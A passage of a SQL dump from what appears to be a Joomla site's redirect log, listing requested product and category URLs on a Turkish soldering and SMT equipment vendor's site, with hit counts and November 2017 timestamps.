00:00:00',301),(9703,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-41-detail/askquestion?tmpl=component',NULL,'','',31,0,'2017-11-07 00:47:26','0000-00-00 00:00:00',301),(9704,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/dirdesc',NULL,'','',46,0,'2017-11-07 00:47:37','0000-00-00 00:00:00',301),(9705,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by,product_name?language=en-gb',NULL,'','',18,0,'2017-11-07 00:58:37','0000-00-00 00:00:00',301),(9706,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/dirdesc',NULL,'','',698,0,'2017-11-07 01:22:12','0000-00-00 00:00:00',301),(9707,'http://www.3s-technologies.com.tr/en/products/manufacturers/tolo',NULL,'','',86,0,'2017-11-07 01:45:38','0000-00-00 00:00:00',301),(9708,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku',NULL,'','',9,0,'2017-11-07 03:57:49','0000-00-00 00:00:00',301),(9709,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer',NULL,'','',20,0,'2017-11-07 04:43:23','0000-00-00 00:00:00',301),(9710,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/trident_full_view_250x250.jpg',NULL,'','',1,0,'2017-11-07 05:58:38','0000-00-00 00:00:00',301),(9711,'http://www.3s-technologies.com.tr/en/products/manufacturers/mirae',NULL,'','',99,0,'2017-11-07 06:16:24','0000-00-00 00:00:00',301),(9712,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/mx200_250x250.jpg',NULL,'','',1,0,'2017-11-07 07:35:58','0000-00-00 00:00:00',301),(9713,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',10,0,'2017-11-07 08:06:13','0000-00-00 00:00:00',301),(9714,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/by,product_name?language=en-gb',NULL,'','',23,0,'2017-11-07 08:11:56','0000-00-00 00:00:00',301),(9715,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',34,0,'2017-11-07 08:18:10','0000-00-00 00:00:00',301),(9716,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&itemid=56&lang=en',NULL,'','',8,0,'2017-11-07 08:40:47','0000-00-00 00:00:00',301),(9717,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/contacts-en',NULL,'','',17,0,'2017-11-07 09:11:31','0000-00-00 00:00:00',301),(9718,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/cm-602-l-detail',NULL,'','',279,0,'2017-11-07 09:11:34','0000-00-00 00:00:00',301),(9719,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',272,0,'2017-11-07 09:11:36','0000-00-00 00:00:00',301),(9720,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/dirdesc',NULL,'','',549,0,'2017-11-07 09:11:38','0000-00-00 00:00:00',301),(9721,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/mx200lp-3-detail',NULL,'','',275,0,'2017-11-07 09:11:41','0000-00-00 00:00:00',301),(9722,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',274,0,'2017-11-07 09:11:46','0000-00-00 00:00:00',301),(9723,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/npm-detail',NULL,'','',271,0,'2017-11-07 09:11:47','0000-00-00 00:00:00',301),(9724,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',271,0,'2017-11-07 09:11:49','0000-00-00 00:00:00',301),(9725,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız?language=en-gb',NULL,'','',1,0,'2017-11-07 09:11:51','0000-00-00 00:00:00',301),(9726,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim',NULL,'','',540,0,'2017-11-07 09:11:53','0000-00-00 00:00:00',301),(9727,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',557,0,'2017-11-07 09:11:55','0000-00-00 00:00:00',301),(9728,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by?category_name&language=en-gb',NULL,'','',12,0,'2017-11-07 09:23:38','0000-00-00 00:00:00',301),(9729,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&itemid=43&lang=tr',NULL,'','',9,0,'2017-11-07 10:46:27','0000-00-00 00:00:00',301),(9730,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',4,0,'2017-11-07 11:45:13','0000-00-00 00:00:00',301),(9731,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/avb-detail',NULL,'','',26,0,'2017-11-07 11:45:13','0000-00-00 00:00:00',301),(9732,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/avb-detail',NULL,'','',1,0,'2017-11-07 11:45:13','0000-00-00 00:00:00',301),(9733,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-33-34-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-07 12:09:38','0000-00-00 00:00:00',301),(9734,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,product_sku?language=tr-tr',NULL,'','',7,0,'2017-11-07 12:11:44','0000-00-00 00:00:00',301),(9735,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-11-07 12:15:45','0000-00-00 00:00:00',301),(9736,'http://www.3s-technologies.com.tr/en/products/smd-fırın',NULL,'','',638,0,'2017-11-07 12:16:27','0000-00-00 00:00:00',301),(9737,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/users-component/index.php/en/using-joomla/extensions/components/users-component/registration-form',NULL,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/registration-form','',1137,0,'2017-11-07 12:16:52','0000-00-00 00:00:00',301),(9738,'http://www.3s-technologies.com.tr/en/+smd',NULL,'http://www.3s-technologies.com.tr','',1,0,'2017-11-07 12:21:20','0000-00-00 00:00:00',301),(9739,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-07 12:29:52','0000-00-00 00:00:00',301),(9740,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',9,0,'2017-11-07 12:35:28','0000-00-00 00:00:00',301),(9741,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/275-k100-1.2mm-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-07 12:44:22','0000-00-00 00:00:00',301),(9742,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',708,0,'2017-11-07 12:56:38','0000-00-00 00:00:00',301),(9743,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name',NULL,'','',11,0,'2017-11-07 13:00:46','0000-00-00 00:00:00',301),(9744,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-11-07 13:12:32','0000-00-00 00:00:00',301),(9745,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı',NULL,'','',627,0,'2017-11-07 13:39:15','0000-00-00 00:00:00',301),(9746,'http://3s-technologies.com.tr/en/products/smd-fırın/by,mf_name',NULL,'','',403,0,'2017-11-07 13:41:39','0000-00-00 00:00:00',301),(9747,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/ess-310-detail',NULL,'','',381,0,'2017-11-07 13:44:40','0000-00-00 00:00:00',301),(9748,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı',NULL,'','',611,0,'2017-11-07 13:48:08','0000-00-00 00:00:00',301),(9749,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,category_name/dirdesc?language=en-gb',NULL,'','',26,0,'2017-11-07 13:49:47','0000-00-00 00:00:00',301),(9750,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-11-07 13:52:08','0000-00-00 00:00:00',301),(9751,'http://3s-technologies.com.tr/tr/urunler/thru-hole/av132-detail',NULL,'','',20,0,'2017-11-07 13:54:04','0000-00-00 00:00:00',301),(9752,'https://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',1,0,'2017-11-07 14:03:22','0000-00-00 00:00:00',301),(9753,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme',NULL,'','',769,0,'2017-11-07 14:06:47','0000-00-00 00:00:00',301),(9754,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız',NULL,'','',646,0,'2017-11-07 14:09:24','0000-00-00 00:00:00',301),(9755,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku',NULL,'','',19,0,'2017-11-07 14:31:04','0000-00-00 00:00:00',301),(9756,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh2-20-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-07 14:56:51','0000-00-00 00:00:00',301),(9757,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-07 15:08:31','0000-00-00 00:00:00',301),(9758,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,mf_name',NULL,'','',44,0,'2017-11-07 15:10:04','0000-00-00 00:00:00',301),(9759,'http://3s-technologies.com.tr/en/products/2.-el-makineler/rh2-detail',NULL,'','',30,0,'2017-11-07 15:10:26','0000-00-00 00:00:00',301),(9760,'http://3s-technologies.com.tr/tr/urunler/thru-hole/jv131-detail',NULL,'','',27,0,'2017-11-07 15:32:46','0000-00-00 00:00:00',301),(9761,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,ordering?language=tr-tr',NULL,'','',8,0,'2017-11-07 15:33:10','0000-00-00 00:00:00',301),(9762,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/rh2-detail',NULL,'','',23,0,'2017-11-07 15:50:07','0000-00-00 00:00:00',301),(9763,'http://3s-technologies.com.tr/tr/urunler/screen-printer/sp-18p-l-detail',NULL,'','',28,0,'2017-11-07 16:03:58','0000-00-00 00:00:00',301),(9764,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name?language=en-gb',NULL,'','',2,0,'2017-11-07 16:09:15','0000-00-00 00:00:00',301),(9765,'http://3s-technologies.com.tr/index.php/en/products/955lc-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-07 16:09:29','0000-00-00 00:00:00',301),(9766,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/cs40-detail',NULL,'','',380,0,'2017-11-07 16:18:17','0000-00-00 00:00:00',301),(9767,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/ls60v-detail',NULL,'','',372,0,'2017-11-07 16:19:25','0000-00-00 00:00:00',301),(9768,'http://3s-technologies.com.tr/index.php/en/products/flux/by,product_sku?language=en-gb',NULL,'','',19,0,'2017-11-07 16:20:28','0000-00-00 00:00:00',301),(9769,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,ordering?language=tr-tr',NULL,'','',2,0,'2017-11-07 16:23:07','0000-00-00 00:00:00',301),(9770,'http://3s-technologies.com.tr/tr/anasayfa',NULL,'','',83,0,'2017-11-07 16:25:05','0000-00-00 00:00:00',301),(9771,'http://3s-technologies.com.tr/en/products/screen-printer/sp-18p-l-detail',NULL,'','',36,0,'2017-11-07 16:26:49','0000-00-00 00:00:00',301),(9772,'http://3s-technologies.com.tr/en/products/screen-printer/asp-300-detail',NULL,'','',29,0,'2017-11-07 16:29:58','0000-00-00 00:00:00',301),(9773,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-11-07 16:30:47','0000-00-00 00:00:00',301),(9774,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/spartan-8s-8d-44-detail',NULL,'','',24,0,'2017-11-07 16:34:15','0000-00-00 00:00:00',301),(9775,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı',NULL,'','',398,0,'2017-11-07 16:37:20','0000-00-00 00:00:00',301),(9776,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,`p`.product_sku?language=en-gb',NULL,'','',14,0,'2017-11-07 16:40:26','0000-00-00 00:00:00',301),(9777,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/rh6-detail',NULL,'','',40,0,'2017-11-07 16:42:09','0000-00-00 00:00:00',301),(9778,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-07 16:43:36','0000-00-00 00:00:00',301),(9779,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,ordering?language=tr-tr',NULL,'','',26,0,'2017-11-07 16:46:55','0000-00-00 00:00:00',301),(9780,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme',NULL,'','',607,0,'2017-11-07 16:52:44','0000-00-00 00:00:00',301),(9781,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız',NULL,'','',391,0,'2017-11-07 16:53:11','0000-00-00 00:00:00',301),(9782,'http://3s-technologies.com.tr/tr/urunler/thru-hole/rl132-detail',NULL,'','',25,0,'2017-11-07 16:53:31','0000-00-00 00:00:00',301),(9783,'http://3s-technologies.com.tr/tr/anasayfa/80-turkish-tr/turkish-content?format=feed&type=rss',NULL,'','',1,0,'2017-11-07 16:55:51','0000-00-00 00:00:00',301),(9784,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/trident-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-07 17:02:42','0000-00-00 00:00:00',301),(9785,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim',NULL,'','',20,0,'2017-11-07 17:04:33','0000-00-00 00:00:00',301),(9786,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri',NULL,'','',37,0,'2017-11-07 17:11:42','0000-00-00 00:00:00',301),(9787,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/mx200lp-detail',NULL,'','',223,0,'2017-11-07 17:20:52','0000-00-00 00:00:00',301),(9788,'http://3s-technologies.com.tr/en/products/2.-el-makineler/rh2-20-detail',NULL,'','',32,0,'2017-11-07 17:23:44','0000-00-00 00:00:00',301),(9789,'http://3s-technologies.com.tr/en/products/temizleme-makineleri',NULL,'','',33,0,'2017-11-07 17:26:33','0000-00-00 00:00:00',301),(9790,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-07 17:41:11','0000-00-00 00:00:00',301),(9791,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-07 17:44:18','0000-00-00 00:00:00',301),(9792,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',4,0,'2017-11-07 17:51:13','0000-00-00 00:00:00',301),(9793,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2017-11-07 17:51:19','0000-00-00 00:00:00',301),(9794,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,category_name',NULL,'','',290,0,'2017-11-07 17:51:25','0000-00-00 00:00:00',301),(9795,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',282,0,'2017-11-07 17:51:34','0000-00-00 00:00:00',301),(9796,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,mf_name',NULL,'','',299,0,'2017-11-07 17:51:54','0000-00-00 00:00:00',301),(9797,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',303,0,'2017-11-07 17:52:00','0000-00-00 00:00:00',301),(9798,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,ordering',NULL,'','',299,0,'2017-11-07 17:52:22','0000-00-00 00:00:00',301),(9799,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_name',NULL,'','',300,0,'2017-11-07 17:52:35','0000-00-00 00:00:00',301),(9800,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',300,0,'2017-11-07 17:52:41','0000-00-00 00:00:00',301),(9801,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_sku',NULL,'','',297,0,'2017-11-07 17:53:09','0000-00-00 00:00:00',301),(9802,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',149,0,'2017-11-07 17:53:24','0000-00-00 00:00:00',301),(9803,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,category_name',NULL,'','',312,0,'2017-11-07 17:53:30','0000-00-00 00:00:00',301),(9804,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,category_name/dirdesc',NULL,'','',303,0,'2017-11-07 17:53:37','0000-00-00 00:00:00',301),(9805,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-07 17:53:51','0000-00-00 00:00:00',301),(9806,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,mf_name',NULL,'','',322,0,'2017-11-07 17:53:59','0000-00-00 00:00:00',301),(9807,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,mf_name/dirdesc',NULL,'','',316,0,'2017-11-07 17:54:08','0000-00-00 00:00:00',301),(9808,'http://3s-technologies.com.tr/tr/urunler',NULL,'','',48,0,'2017-11-07 17:54:13','0000-00-00 00:00:00',301),(9809,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-11-07 17:54:36','0000-00-00 00:00:00',301),(9810,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,ordering',NULL,'','',339,0,'2017-11-07 17:54:42','0000-00-00 00:00:00',301),(9811,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/npm-detail',NULL,'','',195,0,'2017-11-07 17:55:06','0000-00-00 00:00:00',301),(9812,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı',NULL,'','',409,0,'2017-11-07 17:56:23','0000-00-00 00:00:00',301),(9813,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,ordering?language=tr-tr',NULL,'','',1,0,'2017-11-07 17:57:00','0000-00-00 00:00:00',301),(9814,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',373,0,'2017-11-07 17:57:16','0000-00-00 00:00:00',301),(9815,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',382,0,'2017-11-07 17:57:21','0000-00-00 00:00:00',301),(9816,'http://www.3s-technologies.com.tr/tr/urunler/manufacturers/ddm-novastar',NULL,'','',92,0,'2017-11-07 17:57:25','0000-00-00 00:00:00',301),(9817,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',368,0,'2017-11-07 17:57:56','0000-00-00 00:00:00',301),(9818,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',378,0,'2017-11-07 17:58:12','0000-00-00 00:00:00',301),(9819,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı?language=tr-tr',NULL,'','',1,0,'2017-11-07 17:58:26','0000-00-00 00:00:00',301),(9820,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız',NULL,'','',382,0,'2017-11-07 17:58:33','0000-00-00 00:00:00',301),(9821,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_sku',NULL,'','',11,0,'2017-11-07 18:03:14','0000-00-00 00:00:00',301),(9822,'http://3s-technologies.com.tr/en/products/2.-el-makineler/avf-detail',NULL,'','',29,0,'2017-11-07 18:08:09','0000-00-00 00:00:00',301),(9823,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=36&itemid=37',NULL,'','',15,0,'2017-11-07 18:08:43','0000-00-00 00:00:00',301),(9824,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=39&itemid=57',NULL,'','',15,0,'2017-11-07 18:09:03','0000-00-00 00:00:00',301),(9825,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=40&itemid=60',NULL,'','',15,0,'2017-11-07 18:09:20','0000-00-00 00:00:00',301),(9826,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=41&itemid=55',NULL,'','',15,0,'2017-11-07 18:09:36','0000-00-00 00:00:00',301),(9827,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=42&itemid=27',NULL,'','',15,0,'2017-11-07 18:09:47','0000-00-00 00:00:00',301),(9828,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=43&itemid=2',NULL,'','',14,0,'2017-11-07 18:10:06','0000-00-00 00:00:00',301),(9829,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=44&itemid=56',NULL,'','',15,0,'2017-11-07 18:10:22','0000-00-00 00:00:00',301),(9830,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=46&itemid=62',NULL,'','',15,0,'2017-11-07 18:10:33','0000-00-00 00:00:00',301),(9831,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=49&itemid=61',NULL,'','',3,0,'2017-11-07 18:10:56','0000-00-00 00:00:00',301),(9832,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=51&itemid=92',NULL,'','',15,0,'2017-11-07 18:11:11','0000-00-00 00:00:00',301),(9833,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=53&itemid=110',NULL,'','',14,0,'2017-11-07 18:11:30','0000-00-00 00:00:00',301),(9834,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',354,0,'2017-11-07 18:11:42','0000-00-00 00:00:00',301),(9835,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name',NULL,'','',364,0,'2017-11-07 18:11:50','0000-00-00 00:00:00',301),(9836,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',365,0,'2017-11-07 18:12:01','0000-00-00 00:00:00',301),(9837,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',371,0,'2017-11-07 18:12:06','0000-00-00 00:00:00',301),(9838,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',382,0,'2017-11-07 18:12:19','0000-00-00 00:00:00',301),(9839,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',342,0,'2017-11-07 18:12:34','0000-00-00 00:00:00',301),(9840,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,product_name',NULL,'','',356,0,'2017-11-07 18:12:46','0000-00-00 00:00:00',301),(9841,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',348,0,'2017-11-07 18:12:55','0000-00-00 00:00:00',301),(9842,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,product_sku',NULL,'','',363,0,'2017-11-07 18:13:00','0000-00-00 00:00:00',301),(9843,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/cm-602-l-detail',NULL,'','',366,0,'2017-11-07 18:13:11','0000-00-00 00:00:00',301),(9844,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',350,0,'2017-11-07 18:13:20','0000-00-00 00:00:00',301),(9845,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/dirdesc',NULL,'','',363,0,'2017-11-07 18:13:25','0000-00-00 00:00:00',301),(9846,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/mx200lp-3-detail',NULL,'','',368,0,'2017-11-07 18:13:28','0000-00-00 00:00:00',301),(9847,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',350,0,'2017-11-07 18:13:46','0000-00-00 00:00:00',301),(9848,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',8,0,'2017-11-07 18:18:07','0000-00-00 00:00:00',301),(9849,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',683,0,'2017-11-07 18:19:41','0000-00-00 00:00:00',301),(9850,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',688,0,'2017-11-07 18:19:49','0000-00-00 00:00:00',301),(9851,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,category_name?language=en-gb',NULL,'','',1,0,'2017-11-07 18:19:59','0000-00-00 00:00:00',301),(9852,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-07 18:20:13','0000-00-00 00:00:00',301),(9853,'http://3s-technologies.com.tr/tr/urunler/konveyorler',NULL,'','',47,0,'2017-11-07 18:20:19','0000-00-00 00:00:00',301),(9854,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,ordering',NULL,'','',670,0,'2017-11-07 18:20:26','0000-00-00 00:00:00',301),(9855,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-07 18:20:43','0000-00-00 00:00:00',301),(9856,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,product_sku',NULL,'','',706,0,'2017-11-07 18:20:59','0000-00-00 00:00:00',301),(9857,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',640,0,'2017-11-07 18:21:22','0000-00-00 00:00:00',301),(9858,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',633,0,'2017-11-07 18:21:27','0000-00-00 00:00:00',301),(9859,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',651,0,'2017-11-07 18:21:54','0000-00-00 00:00:00',301),(9860,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',576,0,'2017-11-07 18:22:00','0000-00-00 00:00:00',301),(9861,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-07 18:22:21','0000-00-00 00:00:00',301),(9862,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',602,0,'2017-11-07 18:22:27','0000-00-00 00:00:00',301),(9863,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',594,0,'2017-11-07 18:22:39','0000-00-00 00:00:00',301),(9864,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın?language=en-gb',NULL,'','',1,0,'2017-11-07 18:22:57','0000-00-00 00:00:00',301),(9865,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı',NULL,'','',565,0,'2017-11-07 18:23:03','0000-00-00 00:00:00',301),(9866,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',550,0,'2017-11-07 18:23:09','0000-00-00 